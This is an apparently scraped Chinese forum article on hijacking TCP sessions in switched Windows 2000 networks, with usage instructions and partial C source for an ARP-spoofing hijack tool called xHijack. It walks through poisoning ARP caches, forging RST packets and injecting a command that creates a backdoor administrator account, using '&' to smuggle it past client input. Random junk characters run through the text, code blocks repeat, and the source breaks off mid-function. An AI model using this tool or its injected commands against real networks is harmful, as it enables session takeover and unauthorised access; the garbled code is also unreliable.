再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
第二步是ARP欺骗，具体原理我就不说了。
+ z2 a- h+ y: `$ c1 j- i6 }& W3 F* b, T第三步就是开始劫持啦。

6 i  j9 Z/ L* o) u+ E" m我写了个程序xHijack可以实现第二、三步功能，使用如下:
7 `$ f8 v+ \' w+ i6 ?
  `  S. ?8 E! o3 D7 rUsage: xHijack ServerSide ClientSide
  ~  @0 t: W! N- d8 j% z# u
% V+ q% ]  p; r下面根据三种不同的情况分别说明如何输入参数：
# i2 `" A+ Z, V2 k<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
" m: c+ r  E: s3 [假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
c:\>xHijack 192.168.0.2 192.168.0.3
劫持前数据流程：server <--> client
) ?4 ~6 o5 [9 |% S. t7 g2 p3 @劫持后数据流程：server <--> hijacker <--> client
7 v. I" V8 _2 n: x" \% m" m
. v, W) \9 H+ k* F$ ?% B. @<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
. f* W0 z' J# L# j4 D劫持前数据流程：server <--> gw <--> routes <--> client
& V  [  p, D1 N" X2 i劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client
$ A: o: k. b- C+ d: C- X8 T
, f9 t% f8 ?7 [$ o6 G3 u4 q& Q/ l4 U<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
' e" v) w  r5 T& [, v假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
' Y# U8 S" J% f+ R0 `xHijack 192.168.0.1 192.168.0.2
  }, ?# J- z7 c& m劫持前数据流程：client <--> gw <--> routes <--> server
9 U8 P# p8 n8 D: }! L; n4 @7 m劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server

输入两个参数后，会提示你选择网卡，然后会提示
l        <-- List all connections
& p% k0 F3 g6 }' v# K3 |6 ar x       <-- Reset the number x connection
w x       <-- Watch the number x connection
h x command   <-- Hijack the number x connection to execute command
! E) r4 g& h% i
; }2 l2 I0 t6 D# F" W5 N& C9 R6 Glist、reset、watch命令我就不解释了。
9 p/ V* \3 W$ D5 Y假如现在有如下连接
( Y7 f5 U! ?: @2 d$ @* S2 G, p(1) 202.202.202.202:23 <--> 192.168.0.3:2345
我们想要劫持这个连接运行我们的命令，输入
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
( U: X$ k% Z/ y' @4 Q为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
pnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。

劫持的流程如下：
<1>伪装成Server给Client发一个rst包
<2>伪装成Client给Server发了一个数据包
<3>Server回一个ACK包给client
<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server

# {$ \2 h. v* e" Z8 U这样的话，我们只能发一个伪造的包，但我想已经足够了。
0 {2 O( S2 ~  P/ m想要一直劫持那个连接也可以，如下
<1>伪装成Server给Client发一个rst包
  Q( q" A* s1 Y' P<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
4 _9 s, z, W3 `( u<3>伪装成Client给Server发了一个数据包
! p7 i4 r( j7 v1 l) h( L<4>Server回一个ACK包给client
2 x# m) c3 H" e6 Z) ?+ @<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
8 m' c3 R0 a! M<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。

不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。


刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
还请各位多多指点。

& B/ K4 `, f8 a+ T# W9 IBTW:我没有空间，编译好的程序没地方放：（



参考资料
# b" d6 J4 h" G9 H- u" u<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
' ~# O& G) Z9 B7 D# B3 c<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377
+ A  p; m- c9 A0 r

以下是程序代码
----------------------------------------------------------------------
/*-----------------------------------------------------------------------------
  t$ e- V; X  x  pFile      : xHijack.c
Version      : 1.0
Create at    : 2002/8/12
Last modifed at  : 2002/8/19
Author      : eyas
' h+ ~& l  v' n6 _$ a5 l' YEmail      : ey4s@21cn.com
HomePage    : www.ey4s.org
感谢refdom和shotgun发布的源代码，使我获益非浅。
3 z" Z+ F; Z& i" Z6 f" h: M% ZIf you modify the code, or add more functions, please email me a copy.
  ^$ e; y+ _& q4 O9 T" U/ V1 T
; m. W/ G9 K8 {( C1 f( x: Q备注:
+ ?3 u) w4 @3 A) d) \<>没有考虑IP头、TCP头超过20字节的情况
<>没有考虑数据包分片的情况
0 w2 J; \$ k2 G/ ?& A<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
% O+ \4 F. u0 a3 H  G显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
题了。

也许下一版本会修正这些问题，也许不会有下一版本了。
7 W$ J8 \- \! Y5 j3 G
-----------------------------------------------------------------------------*/
#include
#include
#include
#include
#include
9 a) T( n, S* \+ L$ j0 \: c4 ~#include
# e/ v5 `, z  o1 s9 Z#include

( y+ _  g6 p' c9 I& [. Z' u#pragma comment (lib, "packet")
#pragma comment (lib, "iphlpapi")
#pragma comment (lib, "ws2_32")

6 P  E) F) [8 m' t" i: M#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
#define EPT_IP      0x0800      /* type: IP  */
#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
) ]/ @8 J+ Q' k# _! K) l+ M#define EPT_ARP      0x0806      /* type: ARP */
: m; \$ F0 f# w. h* F" g2 w
  H. H% _$ E: y/ l7 X#define  ACTION_NONE    0
#define  ACTION_WATCH  1
#define  ACTION_RESET  2
#define ACTION_HIJACK  3
' d3 W: b3 t1 A, t7 U
/*以1字节对齐*/
5 X2 `* A$ x3 Z# `#pragma pack(1)
* A- z) x2 L5 y& N+ _  O" H- |typedef struct _ehhdr
{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
  unsigned short  EthernetType;
2 s4 `: E# Y' b. n}EHHDR, *PEHHDR;

, @) v* `8 z7 Y* f  w( ptypedef struct _iphdr        //定义IP首部
{
  unsigned char h_verlen;      //4位首部长度,4位IP版本号
  unsigned char tos;        //8位服务类型TOS
  unsigned short total_len;    //16位总长度（字节）
  unsigned short ident;      //16位标识
2 R' r$ {% x. G3 t4 H3 E# Q  unsigned short frag_and_flags;  //3位标志位
8 B8 Y0 f5 C0 i& g/ b& J  unsigned char ttl;        //8位生存时间 TTL
  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
  unsigned short checksum;    //16位IP首部校验和
: t. R* v- A( v6 U7 j7 j* p  unsigned int sourceIP;      //32位源IP地址
1 R, y9 v' Z) L* G. _& v: p  unsigned int destIP;      //32位目的IP地址
; h4 _% U: q9 j, [0 }4 E  Y2 |% x( d}IPHDR, *PIPHDR;

typedef struct _tcphdr        //定义TCP首部
1 i8 R& R6 f, r% b{
) A% S4 n+ q* Z5 U, b* |  USHORT th_sport;        //16位源端口
& G; E  h" z7 k  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
  unsigned int th_ack;      //32位确认号
  unsigned char th_lenres;    //4位首部长度/6位保留字
  unsigned char th_flag;      //6位标志位
  USHORT th_win;          //16位窗口大小
* f1 N( L  I# e- n' B3 M  USHORT th_sum;          //16位校验和
7 o4 E5 C5 e* d' b, P6 q* H  USHORT th_urp;          //16位紧急数据偏移量
}TCPHDR, *PTCPHDR;

$ ]* C  v# O0 ]typedef struct _psdhdr        //定义TCP pseudo header
* L' Y. ~) y0 ?0 r{               
  unsigned long saddr;
  unsigned long daddr;
; ~% t* y. O( c; u; v  char mbz;
; v* e7 u* J# a  char ptcl;
  unsigned short tcpl;
3 d/ b6 s! S! x- o/ q- h8 ~}PSDHDR, *PPSDHDR;
2 W' d) j. t) d4 N, B) a$ U- X$ L
typedef struct _arphdr
% o' i6 C' f4 s/ W7 u9 N, Z" {5 [9 b{
( Z, V2 q: l. y2 z0 R! u+ q" _  unsigned short  HrdType;//硬件类型
$ r% m, M6 s" C  unsigned short  ProType;//协议类型
  unsigned char  HrdAddrlen;//硬件地址长度
  unsigned char  ProAddrLen;//协议地址长度
  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
  unsigned long  SourceIP;/* sender protocol address */
  unsigned char  DestMAC[6];/* target hardware address */
  unsigned long  DestIP;/* target protocol address */
}ARPHDR, *PARPHDR;

# F& G( E' i0 e2 Ktypedef struct _ArpPacket
# J. ^  \* V0 G6 K9 B{
$ L5 U' U1 {0 j: j  EHHDR  ehhdr;
  ARPHDR  arphdr;
}ARPPACKET, *PARPPACKET;
( d. k, z8 l; w3 h! v5 ?' s2 g
! V/ d9 |7 X: _typedef struct _tcppacket
{
3 C* x" o) Y* M7 {  EHHDR  ehhdr;
  IPHDR  iphdr;
$ k0 `! |- t9 f! j8 m- `  TCPHDR  tcphdr;
}TCPPACKET, *PTCPPACKET;

8 k9 a) d% b, D: u3 X1 q9 @typedef struct _conninfo
% e& t/ e' d. X2 q$ a9 u- m{
4 p- ^7 [( ]! c& W8 B  DWORD  dwServerIP;
  USHORT  uServerPort;
( W8 L4 L5 G( j7 o  DWORD  dwClientIP;
* f9 j' Z, m3 j" S0 |% g  USHORT  uClientPort;
' g5 a1 |. D$ ~/ s9 r  DWORD  ident;//标识
! L& W0 S' b) H+ U) n) _  BOOL  bActive;
8 E- d" z2 M+ G$ D1 S: }  struct  _conninfo  *Next;
& ~% v4 x  i5 }, t* W2 e}CONNINFO, *PCONNINFO;
4 X1 u, C( [8 N8 C: x7 h3 ]$ N" g
  x" {# v7 P+ D$ k//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
/ {( J# {( {8 K& Z        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
        g_TotalIP = 0;//
7 P1 d' V3 l6 _( t( C$ u$ Y. Tunsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
unsigned char  g_szServerSideMAC[6];
* z* P  S$ {! l. Fchar      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
! n! i4 U7 u2 S- c& ~! \, [/ tLPADAPTER    g_lpAdapter;
0 n8 J' g" v, K//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
' E  K/ B& _$ _2 z' v" A/ EHANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
2 Y: i' k3 {* n  c; |DWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
' O( n1 Y  |0 I7 IDWORD      g_ident;//节点标识，递增
' U" d" P# J2 z" ~3 H; rPCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
. _: i- ]; P1 m  A- m5 Q8 T( |        g_pConnHead = NULL,
# i% b+ M' m* ^% ]% C' I        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
//函数
void      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
% c, w, Z* e' ~8 U" F" Yvoid      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
* g: _2 h8 ?0 J$ n! ]USHORT      checksum(USHORT *, int);
6 s* t$ m$ V: y) s0 e& ]BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
$ o' m6 ?9 v9 ?; `! U& hBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
) R) X0 w/ J+ A7 ?LPADAPTER    InitAdapter();//初始化一些参数和全局变量
" s" m8 y4 ~4 P2 EBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
- x7 ]! \- d3 |9 }BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
& [6 @' x* I! @) I& v0 dDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
) k: {( T0 _* S4 O9 O8 B: b/ B, TDWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);



int main(int argc, char **argv)
5 }8 `  Y1 {; m6 I" I{
  struct    bpf_stat stat;
  int      i;

  usage();
  S/ c2 |) T3 |5 A$ E9 Q  if (argc != 3) return 0;
# R8 O) c4 ^9 F  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
  S' Z$ i1 d5 p3 k2 Y$ q+ O, }/ A  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
4 V, j& h; h( v" M  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
6 T( P5 r7 w' k: H, A) K) ?0 g3 |  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
8 {0 f0 Z4 X$ I/ P  //create arp spoof thread     
" r2 B6 S5 t, n0 z7 l: G  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
3 M2 e* L. t4 e3 D# @6 v  Sleep(500);
  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
# C( k- N! e0 a) e. a3 V  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
% P2 b" p' b$ H- J$ t: H  //create interface thread
4 X: O# O) `9 z+ L  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
* d5 o1 n* [! ]3 @$ r4 [  //set console ctrl handle
6 t$ f) Z6 E2 b; F  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
0 c  T- Q  l- Z/ @: S    return 0;
  }
$ X0 j) V+ ]7 `' T8 C; W$ @" A  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
3 Q& h3 d% x  `    printf("Warning: unable to get stats from the kernel!\n");
  else
$ A- @# W# K, ]: s    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
( p4 Y4 w, u% S: d" d4 \* g% x% K4 g0 q" Q- t  //free resource   
6 t8 f; V7 l' `0 y+ E! g  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
- s/ U# q6 p& _# c}
/ {+ M+ h3 r$ J; G& H
//
% t# f0 D5 X* x( w$ N, U; X" a//功能：重置所有于ACTION有关的标志
8 [/ m, ?, `7 ~/ \. Y//

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
; W: @8 z/ r3 G7 r9 _2 |        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
* X2 M% `. n: ?% n9 {unsigned char  g_szClientSideMAC[6];
3 k' ^" n, o. \4 l, x* Lunsigned char  g_szServerSideMAC[6];
' k7 ~1 f0 v7 \+ }  zchar      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
. v4 P% y8 |) h' N9 M8 N" U//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
+ S( S9 @9 e0 _) A: l& uchar      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
DWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
! O5 s. r" Q1 C* O5 w7 n        g_pConnHead = NULL,
! y- P$ i) y, y& Q$ v' }        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
. F  b  T0 l4 cLPPACKET    g_lpSendPacket;
//函数
void      usage(void);
' U' A# Q% P& Avoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
/ l, W8 `- R. }0 I# o" A: ovoid      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
) g0 E6 O- J8 g) `8 P8 J# _USHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
5 K7 h. F- ]: {& k" uBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
2 @% p+ F4 y9 r0 n8 JLPADAPTER    InitAdapter();//初始化一些参数和全局变量
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
' P- `7 c! g5 G3 F) S: NDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
9 v6 a8 R# N1 @. g7 J& [) @DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
0 V3 H1 X' |5 ?- i( YDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
  j, H1 C: p. t6 ^& o/ s, ?DWORD  WINAPI  InterfaceThread(LPVOID);//
1 N$ ~+ ~; H/ D* oBOOL  WINAPI  CtrlEvent(DWORD);
7 S; l; \; G- J3 F, z" h
& k7 F( o6 E# ~. P6 P+ z
" H  j8 n4 L& m; B5 x5 g" O
& K! H5 W: X- F4 Tint main(int argc, char **argv)
9 E: d8 x, N- V( s" a  D8 ^{
  struct    bpf_stat stat;
+ q, H" U: L- G4 ]* J3 Y9 w  int      i;
7 A! k* x; N! Q2 v. g9 w
+ A. `- y5 t7 n; v/ |+ c  usage();
' B: }) f. b6 D7 f( ?( e" O* k  if (argc != 3) return 0;
  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
5 B* E' S2 B6 Z  g_ClientSideIP = inet_addr(argv[2]);
  Z# `8 {8 @; T" A  //初始化adapter & 一些全局变量
3 v. i: B! d- [9 A( e( @% f" b" r  g_lpAdapter = InitAdapter();
" J3 s- G/ g# D6 o2 Y9 e" C* |/ `+ P0 |  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
" r7 R1 ]3 c2 `% X- R  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
7 ]* v; R8 f; u$ e) S2 N  //create arp spoof thread     
  i = 1;
( b' f* `' h2 K: T# \* N% Q  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
) ^+ I+ z3 y2 _, l4 N5 s( V  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
& @* ~4 x/ t* r) k  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
/ V; q1 p4 V3 Z, G; F  //set console ctrl handle
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
; C4 C# D7 T: ?* U$ d  {
2 K3 L( b+ |. A7 q3 d8 m% B0 b1 N    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
# L, b0 F9 O( j# u    return 0;
2 N1 A$ k1 m  D% F8 a9 ?  }
4 I- W! G& ~2 j! a0 n9 i! R+ \  //wait for any thread exit
: a6 D; G! b7 N0 a  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
5 Q9 R3 E" b  j  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
+ {2 L; Q" `2 `9 U  I/ i( c* W% K  else
1 A4 Z! _. ~2 {1 j9 {    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
# A1 Q: X3 I( d; t  //free resource   
3 R7 n+ S+ L8 ~( ~3 j* J0 a* k- Y/ w  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
* b( [, H4 Y! [- ~  return 0;
( \) F1 t0 I, w. y, M0 _/ J0 e0 i}
" n5 W* E; f  H& f" h
; X; t; i. c2 X4 w" R//
//功能：重置所有于ACTION有关的标志
, V8 o. ]* @1 F+ b# M- Z1 b//

韩冰

void ResetActionAllFlag()
; @- b1 D7 p" _{
  g_dwCtrlConn = 0;
% N$ C3 }- x/ d; X- c" w8 Z  g_pCurrCtrlConn = NULL;
  y) k  m+ e% s1 J1 R- g7 u$ Y6 o  x3 X4 d  g_dwAction = ACTION_NONE;
2 @4 V" ], |! F! ^9 U! M# Z}

//
//功能：处理Ctrl+C和Ctrl+Break事件
//
BOOL WINAPI CtrlEvent(DWORD dwCtrlType)
0 S& b8 ]5 u( _0 ^5 [5 W, Y% M{
+ ?0 y4 T+ ~3 p9 m  switch(dwCtrlType)
2 z% I: n2 U; D0 H  {
3 w/ S, V# A- h& H    case CTRL_BREAK_EVENT:
0 I( g9 A8 ?: M      //reset action all flag
      ResetActionAllFlag();
      break;
) Z, w  c1 z6 }! j) D    case CTRL_C_EVENT:
' t1 K1 u  Q8 R  Z/ y! A6 s9 d2 G      //terminate all thread
9 V( `4 b% s0 ^- [      TerminateThread(g_hThread[0], 0);
      TerminateThread(g_hThread[1], 0);
      TerminateThread(g_hThread[2], 0);
/ E  `: D. R- {" @9 ?      TerminateThread(g_hThread[3], 0);
- {0 g: a4 Q) ]# g; Y  h" w      break;
    default:
      break;
" ]8 `% Y% j! L  [3 y  }
) D" P3 X! _% K7 z7 c: z7 q  return TRUE;
}
  }3 h6 _: E" I' x' P" q: ]
' S8 \( w* D+ f3 W6 y//
& E) P- ]0 l5 e  C: m0 `//功能：处理用户输入
+ [. J5 |: Q/ o' E. h' E5 i/ N//
5 [' Z9 }  h' c, k* m+ ~1 [0 K* ?DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
' H$ n( H% s* Q/ Y2 q$ i# p5 ~8 \{
& g* P9 p5 ], M8 |3 _  DWORD  i;
& \/ S0 y% @( B4 l0 w  char  szBuff[16];

, \; M2 f. t7 q  *lpCommandPos = 0;
  for(i=0; i<15, i代码比较乱
//
DWORD WINAPI InterfaceThread(LPVOID lp)
{
  @2 V$ p% F% C2 L& M; r& ?! ?  char  szHelp[] =  "l\t\t<-- List all connections\n"
            "r x\t\t<-- Reset the number x connection\n"
            "w x\t\t<-- Watch the number x connection\n"
. C1 q5 ]2 W1 B  M5 P            "h x command\t<-- Hijack the number x connection to execute command\n"
            "[Note]\n"
            "Ctrl+Break to clear all action\n"
- L* J; b! g; U- S. U5 x% H0 n            "Ctrl+C to exit\n";
  char  szPrompt[] = "\nxHijack>";
( ^# l& ~7 O2 _9 Y1 R* ]1 A  char  szBuffer[128];
# r+ f/ e3 E; r  DWORD  dwPos;
  PCONNINFO  pTmp;
- _9 C5 w4 ?- u3 P
  while(1)
* O1 [0 a, ?6 b. P' {  {
    gets(szBuffer);//不考虑buffer overflow
2 A% o. f# E/ w# d3 |% q    switch(szBuffer[0])
; e: B& n& g0 z3 E! e    {
      case 'l':
- i- L' Z! f+ [6 p2 o      case 'L':
        ListAllConnection();
        break;
  R* c7 Z4 B" q2 J7 t+ b7 F# F$ W1 p      case 'r':
      case 'R':
1 n# m) p2 c7 l        if(strlen(szBuffer) >2)
, |$ O7 S. {' N0 i7 ?- i        {
; d: X, _9 W  i' c& f" l          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
2 D7 _0 L0 I& x* ~" ?; l7 ]! C1 r          g_dwAction = ACTION_RESET;
        }
8 X1 ^& C% ~5 \% a' ?        else printf("%s", szHelp);
        break;
9 D1 o- |/ R% ?8 h      case 'w':
" z, C  ^( u7 h  Z      case 'W':
        if(strlen(szBuffer) > 2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
! e" ]* X  D2 u, |5 D1 G2 c          g_dwAction = ACTION_WATCH;
        }
        else printf("%s", szHelp);
        break;
      case 'h':
" i- I* m) ]9 |3 E, B& J$ t) e3 q; f) C      case 'H'://h 1 xxx
        if(strlen(szBuffer) > 5)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          //如果command第一个字符是'或"
          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
          }
/ B4 Y" C  f8 N" n, `          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
2 T$ y( ~: x; B& k! m          strcat(g_szCommand, "\x0D\x0A");
          g_dwAction = ACTION_HIJACK;
        }
        else printf("%s", szHelp);
        break;
) I# m; T! g0 @9 \      default:
9 D$ S* b+ w/ p, y" m7 E- }5 x        printf("%s", szHelp);
        break;
    }//end of switch
    //find the specify ident's struct point
2 ~6 [8 N) Y# ?. z( F) w3 c& {    if( (g_dwCtrlConn) && (g_dwAction) )
    {
1 X$ d: x+ B' L$ L2 [      g_pCurrCtrlConn = NULL;
0 J9 T1 x+ @% d      pTmp = g_pConnHead;
# y+ m! r7 b3 M2 R      while(pTmp)
: c# h3 z& C9 z      {
        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
% v% l" j* _6 X8 K/ A. _+ {        {
          g_pCurrCtrlConn = pTmp;
9 W4 A% Z- T/ f          break;
        }
        pTmp = pTmp->Next;
      }
: |9 t: e  [0 ^( I      if(!g_pCurrCtrlConn)
      {
- J" N" F+ e+ m        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
        //reset action all flag
0 H" g  O' |8 b5 b3 J! ]. `        ResetActionAllFlag();      
( d; S+ m& A7 L- ^      }
$ ~& z) }7 |' K7 u/ {    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
+ m$ ?" L" d: Z; z6 M    //显示当前用户所期望的动作
7 l4 P; a( t- j4 \1 u7 L" n    printf("\nCurrentAction:");
    switch(g_dwAction)
. T% x! h+ v& ?" d    {
      case ACTION_WATCH:
        printf("ACTION_WATCH");
2 U7 O) z8 j5 L. o        break;
      case ACTION_RESET:
# k# P* L. Q5 B        printf("ACTION_RESET");
1 K5 x" X: P4 J        break;
7 g2 w7 x& M) b0 m# g0 f      case ACTION_HIJACK:
' J0 o4 x4 t; N0 D( b! h        printf("ACTION_HIJACK");
        break;
  J+ H0 I- j7 z& s      default:
        printf("ACTION_NONE");
        break;
6 V& ]" z  f" Q    }
- d5 Z0 o, N6 ]# E! j8 v! o6 g    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
! G3 q9 k; [& i' p  }//enf of while
2 T# l/ I3 u) Y  p% G  return 0;
}

韩冰

// / L$ ?5 u9 U( f3 b( x, @0 O: ?9 K//功能：列出当前所有连接 $ x$ Z" S0 _. r// , m1 [+ g N$ m# u/ f. vvoid ListAllConnection() ( W: Z* I/ S R{ PCONNINFO pTmp; SOCKADDR_IN saDest, saSource; % {* E' m( h! Z pTmp = g_pConnHead; while(pTmp) , ?' U! ]3 u- a* |4 W/ O { if(pTmp->bActive) { # F" _' B3 a5 ~: J- ~ saSource.sin_addr.s_addr = pTmp->dwServerIP; saDest.sin_addr.s_addr = pTmp->dwClientIP; printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), , N r! ]$ }+ L' u ntohs(pTmp->uServerPort)); & O# y3 e4 H. Q printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); $ n! H+ c/ w4 p+ @, T$ N, B# m } pTmp = pTmp->Next; . M* p8 O) m q6 @& O! W) X, i } } 9 g" l4 e, ~, G2 t1 _// //功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 3 D, p, c$ ]0 ^3 ^7 n! q// LPADAPTER InitAdapter() - D5 Y& \. w6 F l, c{ . I x) h1 a' s" x( U3 z d2 O LPADAPTER lpAdapter; . t; c6 L8 J- U0 }9 ?3 P static char AdapterList[Max_Num_Adapter][1024]; char szSelectAdapterName[512]; * p2 w' x! f- K WCHAR AdapterName[2048]; : B& u% g% P# _) ?+ u. S9 Z WCHAR *temp,*temp1; / @5 Z7 L& L% N7 G* F4 y ULONG AdapterLength = 1024; int iAdapterNum = 0; int iRetCode, i; - o% k# S3 V) o% ^4 g3 [ int iAdapter = 0; ULONG ulLen = 0; DWORD dwRet; 0 `9 b: B4 ^8 D- X* J* Q8 \ PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; 2 ?# d; ]/ n, F: V3 w PIP_ADDR_STRING pIPAddr; - f; B. t/ }& R" o3 c //Get The list of Adapter if(PacketGetAdapterNames((char*)AdapterName, 